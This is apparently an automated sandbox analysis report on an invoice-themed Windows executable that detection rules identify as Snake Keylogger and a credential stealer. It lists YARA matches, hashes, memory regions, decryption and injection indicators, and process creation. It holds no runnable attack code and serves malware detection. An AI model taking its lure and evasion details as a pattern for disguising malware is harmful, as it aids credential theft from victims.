                  Source: Process Memory Space: FATURA VE BELGELER..exe PID: 6368, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: FATURA VE BELGELER..exe PID: 6368, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 0_2_028ADCD40_2_028ADCD4
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 0_2_04B211B80_2_04B211B8
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 0_2_050370180_2_05037018
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 0_2_050300060_2_05030006
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 0_2_050300400_2_05030040
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 0_2_050370080_2_05037008
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 0_2_06CC44E80_2_06CC44E8
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 0_2_06CCB6380_2_06CCB638
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 0_2_06CC44D80_2_06CC44D8
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 0_2_06CCD2700_2_06CCD270
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 0_2_06CCB2000_2_06CCB200
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 0_2_06CCB1F00_2_06CCB1F0
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 0_2_06CC2F800_2_06CC2F80
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 0_2_06CC2F900_2_06CC2F90
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 0_2_06CCADC80_2_06CCADC8
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 0_2_06CCBA700_2_06CCBA70
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0281B3883_2_0281B388
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0281C1F03_2_0281C1F0
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_028161683_2_02816168
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_028167903_2_02816790
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0281C7B13_2_0281C7B1
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0281C4D03_2_0281C4D0
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0281CA913_2_0281CA91
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_02814B313_2_02814B31
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_028198483_2_02819848
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0281BF103_2_0281BF10
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0281BC323_2_0281BC32
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0281F4E83_2_0281F4E8
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_028135C83_2_028135C8
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0281B5523_2_0281B552
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0281EA083_2_0281EA08
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0281E9F83_2_0281E9F8
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0281F9413_2_0281F941
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_06698A583_2_06698A58
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0669CE283_2_0669CE28
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0669DAC03_2_0669DAC0
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0669AEA83_2_0669AEA8
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0669BB383_2_0669BB38
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0669C7D83_2_0669C7D8
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0669D4783_2_0669D478
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0669A8583_2_0669A858
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0669B4F03_2_0669B4F0
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0669908E3_2_0669908E
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066915F83_2_066915F8
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0669C1883_2_0669C188
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_06695A683_2_06695A68
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_06698A483_2_06698A48
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_06695A583_2_06695A58
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066986003_2_06698600
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0669CE183_2_0669CE18
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_06695EC03_2_06695EC0
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0669DAAF3_2_0669DAAF
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_06695EB23_2_06695EB2
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0669AE983_2_0669AE98
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066967603_2_06696760
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066967703_2_06696770
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0669BB273_2_0669BB27
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066963083_2_06696308
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066963183_2_06696318
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066937FA3_2_066937FA
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_06696BC83_2_06696BC8
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0669C7CA3_2_0669C7CA
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_06696BB83_2_06696BB8
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_06693B803_2_06693B80
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_06692C683_2_06692C68
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0669D4683_2_0669D468
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0669A8483_2_0669A848
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066900403_2_06690040
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066970203_2_06697020
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066938083_2_06693808
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066900063_2_06690006
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066970103_2_06697010
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066908E13_2_066908E1
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0669B4E03_2_0669B4E0
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066978E73_2_066978E7
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066978F83_2_066978F8
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066908F03_2_066908F0
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066974A03_2_066974A0
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066904883_2_06690488
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066948803_2_06694880
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066904983_2_06690498
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066974903_2_06697490
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0669C1783_2_0669C178
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_06690D483_2_06690D48
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_06697D403_2_06697D40
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_06697D503_2_06697D50
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_06690D383_2_06690D38
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066955E83_2_066955E8
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066985F13_2_066985F1
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066955DA3_2_066955DA
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066981A83_2_066981A8
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066911A03_2_066911A0
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_0669819A3_2_0669819A
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066911913_2_06691191
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066BBFEC3_2_066BBFEC
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeCode function: 3_2_066BDC483_2_066BDC48
                  Source: FATURA VE BELGELER..exe, 00000000.00000002.1990719026.00000000051B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dllD vs FATURA VE BELGELER..exe
                  Source: FATURA VE BELGELER..exe, 00000000.00000002.1988410714.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dllD vs FATURA VE BELGELER..exe
                  Source: FATURA VE BELGELER..exe, 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs FATURA VE BELGELER..exe
                  Source: FATURA VE BELGELER..exe, 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs FATURA VE BELGELER..exe
                  Source: FATURA VE BELGELER..exe, 00000000.00000002.1991075872.0000000006F50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs FATURA VE BELGELER..exe
                  Source: FATURA VE BELGELER..exe, 00000000.00000000.1977661327.000000000077A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHJbl.exe6 vs FATURA VE BELGELER..exe
                  Source: FATURA VE BELGELER..exe, 00000000.00000002.1987516340.0000000000D4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHJbl.exe6 vs FATURA VE BELGELER..exe
                  Source: FATURA VE BELGELER..exe, 00000000.00000002.1987470017.0000000000C9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs FATURA VE BELGELER..exe
                  Source: FATURA VE BELGELER..exe, 00000000.00000002.1988410714.0000000002B38000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs FATURA VE BELGELER..exe
                  Source: FATURA VE BELGELER..exe, 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs FATURA VE BELGELER..exe
                  Source: FATURA VE BELGELER..exe, 00000003.00000002.4443199128.0000000000AF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs FATURA VE BELGELER..exe
                  Source: FATURA VE BELGELER..exeBinary or memory string: OriginalFilenameHJbl.exe6 vs FATURA VE BELGELER..exe
                  Source: FATURA VE BELGELER..exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 3.2.FATURA VE BELGELER..exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.FATURA VE BELGELER..exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.FATURA VE BELGELER..exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 3.2.FATURA VE BELGELER..exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: FATURA VE BELGELER..exe PID: 6464, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: FATURA VE BELGELER..exe PID: 6464, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: FATURA VE BELGELER..exe PID: 6368, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: FATURA VE BELGELER..exe PID: 6368, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: FATURA VE BELGELER..exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.FATURA VE BELGELER..exe.2b077fc.0.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.FATURA VE BELGELER..exe.2b077fc.0.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, --K.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, --K.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.FATURA VE BELGELER..exe.5400000.10.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.FATURA VE BELGELER..exe.5400000.10.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, --K.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, --K.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, BEm2Jp6mHTFCaiDYj3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, WSy7P55k0hTS6fLHwF.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, WSy7P55k0hTS6fLHwF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, WSy7P55k0hTS6fLHwF.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, WSy7P55k0hTS6fLHwF.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, WSy7P55k0hTS6fLHwF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.FATURA VE BELGELER..exe.6f50000.11.raw.unpack, WSy7P55k0hTS6fLHwF.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.FATURA VE BELGELER..exe.3dc7950.8.raw.unpack, BEm2Jp6mHTFCaiDYj3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.FATURA VE BELGELER..exe.2b077fc.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                  Source: 0.2.FATURA VE BELGELER..exe.5400000.10.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                  Source: 0.2.FATURA VE BELGELER..exe.2af6b84.3.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FATURA VE BELGELER..exe.logJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeMutant created: NULL
                  Source: FATURA VE BELGELER..exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: FATURA VE BELGELER..exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: FATURA VE BELGELER..exe, 00000000.00000000.1977538604.00000000006D2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: select * from detainedLicenses_View order by IsReleased ,DetainID;
                  Source: FATURA VE BELGELER..exe, 00000000.00000000.1977538604.00000000006D2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: SELECT * FROM Users WHERE Username = @Username and Password=@Password;
                  Source: FATURA VE BELGELER..exe, 00000000.00000000.1977538604.00000000006D2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: select TestID from Tests where TestAppointmentID=@TestAppointmentID;mSELECT * FROM TestTypes WHERE TestTypeID = @TestTypeID
                  Source: FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002CDD000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002CB5000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4445442988.0000000003ACE000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002CE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: FATURA VE BELGELER..exeReversingLabs: Detection: 42%
                  Source: FATURA VE BELGELER..exeVirustotal: Detection: 56%
                  Source: FATURA VE BELGELER..exeString found in binary or memory: $42c49fa3-77d8-41fa-a100-addbd66b9f88
                  Source: unknownProcess created: C:\Users\user\Desktop\FATURA VE BELGELER..exe "C:\Users\user\Desktop\FATURA VE BELGELER..exe"
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess created: C:\Users\user\Desktop\FATURA VE BELGELER..exe "C:\Users\user\Desktop\FATURA VE BELGELER..exe"
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeProcess created: C:\Users\user\Desktop\FATURA VE BELGELER..exe "C:\Users\user\Desktop\FATURA VE BELGELER..exe"Jump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\FATURA VE BELGELER..exeSection loaded: apphelp.dllJump to behavior
